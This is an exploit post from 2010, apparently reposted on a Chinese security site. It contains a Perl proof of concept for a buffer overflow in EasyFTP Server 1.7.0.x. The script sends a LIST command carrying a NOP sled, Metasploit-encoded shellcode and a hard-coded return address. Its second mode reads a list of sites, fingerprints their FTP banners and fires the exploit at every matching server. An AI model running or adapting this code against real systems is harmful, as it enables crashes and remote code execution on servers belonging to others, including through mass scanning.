EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC
|
来源:fer_henrick@hotmail.com 作者:P4ck3t 发布时间:2010-10-20
|
|
sub banner {
print q { ########################################################################################################## # # # [*] PoC EasyFTP 1.7.0.X Crash # # # # [*] Author: Inj3cti0n P4ck3t # # # # [*] e-mail: fer_henrick@hotmail.com # # # # [*] Date: 18/10/2010 # # # # [*] Greetz: C00l3r - fvox - _MLK_ - DD3str0y3r - s4r4d0 - Sh0rtKiller # # HADES - CODERED - FORAST - Colt7r - Z4i0n - M0nt3r # # Th1nk3r - Hackinho - r0t3d - elemento_pcx - Observing # # Believe - dr4k3 - Bl4ck9_f0x6 # # # # [*] Version Vulnerable: # # # # - EasyFTP Server 1.7.0.11 EN # # # # - EasyFTP Server 1.7.0.2 EN # # # # # # # # [*] System Operacional Tested: # # # # - Windows XP PACK 3 Brazilian # # # # # # # # # # - EasyFTP Server 1.7.0.2 => http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip # # # # - EasyFTP Server 1.7.0.11 => http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip # # # # # ###############################Code Exploit ##############################################################
} }
#!usr/bin/perl
use strict; use IO::Socket; use IO::Socket::INET;
if (!$ARGV[0]) { &banner();
print q {
Options:
[1] - Test Exploit [2] - Test ScanXploit
} }
print " [+] Options: "; our $option = <stdin>; chomp ($option);
if ($option == 1) {
my $portTest ="21"; my $hostTest="127.0.0.1"; my $usuarioTest ="anonymous"; my $senhaTest = "adminadmin";
# Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ] my $shellCodeTest = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28"); my $nopsTest = ("\x90" x 40); my $retornoTest = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ] my $PayloadTest = $nopsTest . $shellCodeTest . $retornoTest;
my $AutenticarTest = ("\x55\x53\x45\x52\x20" . $usuarioTest . "\r\n" . "\x50\x41\x53\x53\x20 " . $senhaTest . "\r\n" . "LIST " . $PayloadTest . "\r\n" );
my $socketTest = new IO::Socket::INET (PeerAddr => $hostTest,PeerPort => $portTest,Proto => 'tcp',); die " [x] Error: $!\n" unless $socketTest;
print $socketTest $AutenticarTest;
close($socketTest);
sleep(2);
our $soquetes = IO::Socket::INET->new("$hostTest:$portTest");
if($soquetes) {
print " [-] Server no exploited \n"; } else {
print " [+] Server Exploited\n";
}
}
################################## ScanXploit #############################################################################################
if ($option == 2) { print " [+] Digite o nome da lista de sites, exampl,: lista.txt: "; our $lista = <stdin>; chomp ($lista);
open( SITE, "< $lista" ) or die( " [-] Could not open file: $!" );
our @array = <SITE>;
our $numero = $#array;
for (our $i = 0; $i <= $numero; $i++) {
our $Url = "$array[$i]";
if($Url !~ /http:\/\//) { $Url = "http://$Url"; }
our $Stop = index($Url,":"); our $Protocolo = substr($Url,0,$Stop); our $Start = index($Url,"//") + 2; our $Dominio = substr($Url,$Start); our $Stop = index($Dominio,"/"); our $Dominio = substr($Dominio,0,$Stop); our $Start = rindex($Url,"/") + 1; our $NomeArq = substr($Url,$Start); our $Compr_Url = length($Url);
our $ponto = "$Dominio \n";
our @portas = "21";
foreach our $porta (@portas) {
our $sock = IO::Socket::INET->new("$ponto:$porta");
if($sock) {
our $remote = IO::Socket::INET -> new (Proto => "tcp", PeerAddr => $ponto, PeerPort => $porta, Timeout => "7");
our $line = <$remote>;
if ($line =~ "BigFoolCat") {
my $usuario ="anonymous"; my $senha = "adminadmin";
# Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ] my $shellCode = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8\x51\x6b\x28"); my $nops = ("\x90" x 40); my $retorno = ("\x10\x3B\x88\x00"); # MAGIC RET 00883B10 [ CALL EDI ] my $Payload = $nops . $shellCode . $retorno;
my $Autenticar = ("\x55\x53\x45\x52\x20" . $usuario . "\r\n" . "\x50\x41\x53\x53\x20 " . $senha . "\r\n" . "LIST " . $Payload . "\r\n" );
our $socket = new IO::Socket::INET (PeerAddr => $ponto,PeerPort => $porta,Proto => 'tcp',); die "[x] Error: $!\n" unless $socket;
print $socket $Autenticar;
close($socket);
} sleep(2);
our $soquete = IO::Socket::INET->new("$ponto:$porta");
if($soquete) {
print " [-] Server no exploited \n"; } else {
print " [+] Server Exploited\n";
}
} } }
print " [+] Servers tested: $numero \n";
}
if ($option != 1 && $option != 2 ) {
print " [+] Option invalid \n\n";
}
exit;
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|